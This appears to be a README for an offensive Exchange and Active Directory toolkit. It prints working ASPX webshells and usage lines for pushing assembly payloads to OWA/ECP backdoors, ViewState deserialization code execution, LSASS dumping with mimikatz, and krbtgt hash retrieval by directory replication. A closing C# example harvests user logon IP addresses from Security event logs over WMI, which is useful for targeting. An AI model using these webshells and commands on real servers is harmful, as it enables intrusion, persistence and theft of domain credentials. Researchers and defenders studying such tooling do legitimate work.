Note: at most 1000 entries are returned per query (this equals the DC's default MaxPageSize; a paged search is needed to retrieve more).
E.g.:
SharpADFindDemo.exe 192.168.1.1 test1 password1 user
Python version: SharpExchangeBackdoor.py
Used to send a payload to an Exchange webshell backdoor.
Supported modes:
- assemblyLoad: POST a Base64-encoded .NET assembly in the demodata form field; the webshell loads it and instantiates the type named Payload
- webshellWrite: upload a file, which the webshell saves next to itself as uploadDemo.aspx
Usage:
SharpExchangeBackdoor.exe <url> <user> <password> <mode> <path>
mode:
assemblyLoad
webshellWrite
E.g.
SharpExchangeBackdoor.exe https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
SharpExchangeBackdoor.exe https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx
(pages under /owa/auth/ are reachable without authentication, so "no auth" just fills the unused user and password arguments)
assemblyLoad.aspx:
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>
webshellWrite.aspx:
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));%>
Used to create a ViewState payload from a XAML file.
Usage:
XamlToViewState.exe <xaml path> <generator> <key>
<generator> is the target page's __VIEWSTATEGENERATOR value and <key> is the machineKey validationKey the page is signed with.
E.g.
Used to create a ViewState payload from serialized XAML data.
Code from https://github.com/zcgonvh/CVE-2020-0688/blob/master/ExchangeCmd.cs
Used to test deserialization code execution on Exchange:
turning read and write access to Exchange's files into code execution through ViewState deserialization.
You must first change the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\<path>\web.config so that its validationKey matches the <key> you pass; otherwise the ViewState MAC does not verify and nothing is deserialized.
<path>: owa or ecp
Usage:
<url> <key> <path>
E.g.
192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp
Used to send a payload to an Exchange webshell backdoor. The communication is encrypted with AES.
Supported functions:
- generate: generate the webshell
- dumplsass: save a dump of LSASS to C:\Windows\Temp\lsass.bin
- parsedump: use mimikatz to load C:\Windows\Temp\lsass.bin and save the results to C:\Windows\Temp\mimikatz.log
Usage:
SharpExchangeDumpHash.exe <url> <user> <password> <mode>
mode:
- generate
- dumplsass
- parsedump
E.g.
SharpExchangeDumpHash.exe https://192.168.1.1/owa/auth/1.aspx no auth dumplsass
SharpExchangeDumpHash.exe https://192.168.1.1/ecp/Education.aspx user1 123456 parsedump
Uses the DRSR protocol (MS-DRSR, the directory replication RPC interface) to ask a domain controller for the krbtgt hash. Like dcsync, this needs the replication rights on the domain.
Reference: https://github.com/vletoux/MakeMeEnterpriseAdmin
Uses the DRSR protocol to ask a domain controller to replicate a specified entry.
Reference: https://github.com/vletoux/MakeMeEnterpriseAdmin
Used to import a TGT.
Reference: https://github.com/vletoux/MakeMeEnterpriseAdmin
Uses RPC to get the logon IP addresses of domain users from the logon events in the event log.
Supports local and remote access.
Uses WMI to get the logon IP addresses of domain users from the logon events in the event log.
Supports local and remote access.
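The WMI approach, added as an example that is not the page's tool: query Win32_NTLogEvent for 4624 (successful logon) events in the Security log, locally or on a remote host, and pull the account and source address out of the message text. The argument layout, the regular expressions, the filtering on logon types 3 and 10 and the per-pair counting are the example's own assumptions; compile with /r:System.Management.dll.

```csharp
using System;
using System.Collections.Generic;
using System.Management;
using System.Text.RegularExpressions;

// Added example: summarize who logged on from which address, from 4624 events
// read over WMI. Regexes follow the 4624 message layout (Logon Type, New Logon
// section, Network Information section).
class LogonIpWmiExample
{
    static readonly Regex LogonType = new Regex(@"Logon Type:\s+(\d+)");
    static readonly Regex NewLogon = new Regex(@"New Logon:.*?Account Name:\s+(\S+)\s+Account Domain:\s+(\S+)", RegexOptions.Singleline);
    static readonly Regex SourceIp = new Regex(@"Source Network Address:\s+(\S+)");

    static void Main(string[] args)
    {
        // usage: LogonIpWmiExample.exe [host [DOMAIN\user password]]
        string host = args.Length > 0 ? args[0] : ".";
        ConnectionOptions opts = new ConnectionOptions();
        opts.Impersonation = ImpersonationLevel.Impersonate;
        opts.EnablePrivileges = true;          // reading the Security log needs SeSecurityPrivilege
        if (args.Length == 3)                   // explicit credentials are only allowed for remote hosts
        {
            opts.Username = args[1];
            opts.Password = args[2];
        }
        ManagementScope scope = new ManagementScope(@"\\" + host + @"\root\cimv2", opts);
        scope.Connect();

        ObjectQuery query = new ObjectQuery(
            "SELECT TimeGenerated, Message FROM Win32_NTLogEvent WHERE Logfile='Security' AND EventCode=4624");
        Dictionary<string, int> counts = new Dictionary<string, int>();
        DateTime newest = DateTime.MinValue, oldest = DateTime.MaxValue;

        using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
        {
            foreach (ManagementObject ev in searcher.Get())
            {
                string msg = ev["Message"] as string;
                if (msg == null) continue;                     // message DLL not resolvable
                Match lt = LogonType.Match(msg), who = NewLogon.Match(msg), ip = SourceIp.Match(msg);
                if (!lt.Success || !who.Success || !ip.Success) continue;

                // Only network (3) and RemoteInteractive (10) logons carry a meaningful source address.
                string type = lt.Groups[1].Value;
                if (type != "3" && type != "10") continue;
                string user = who.Groups[2].Value + "\\" + who.Groups[1].Value;
                string addr = ip.Groups[1].Value;
                if (addr == "-" || addr == "::1" || addr == "127.0.0.1") continue;   // no usable source
                if (user.EndsWith("$")) continue;                                   // machine accounts

                DateTime when = ManagementDateTimeConverter.ToDateTime((string)ev["TimeGenerated"]);
                if (when > newest) newest = when;
                if (when < oldest) oldest = when;
                string key = string.Format("{0}\t{1}\ttype {2}", user, addr, type);
                int c;
                counts.TryGetValue(key, out c);
                counts[key] = c + 1;
            }
        }

        Console.WriteLine("{0} user/address pair(s) between {1:u} and {2:u}", counts.Count, oldest, newest);
        foreach (KeyValuePair<string, int> kv in counts)
            Console.WriteLine("{0}\t{1} logon(s)", kv.Key, kv.Value);
    }
}
```

Win32_NTLogEvent walks the whole log, so on a busy domain controller this is slow; the same query with an added "AND TimeGenerated > '<WMI datetime>'" clause narrows it to a window. Remote access additionally needs the WMI (DCOM) ports open and the caller in the local Administrators group of the target.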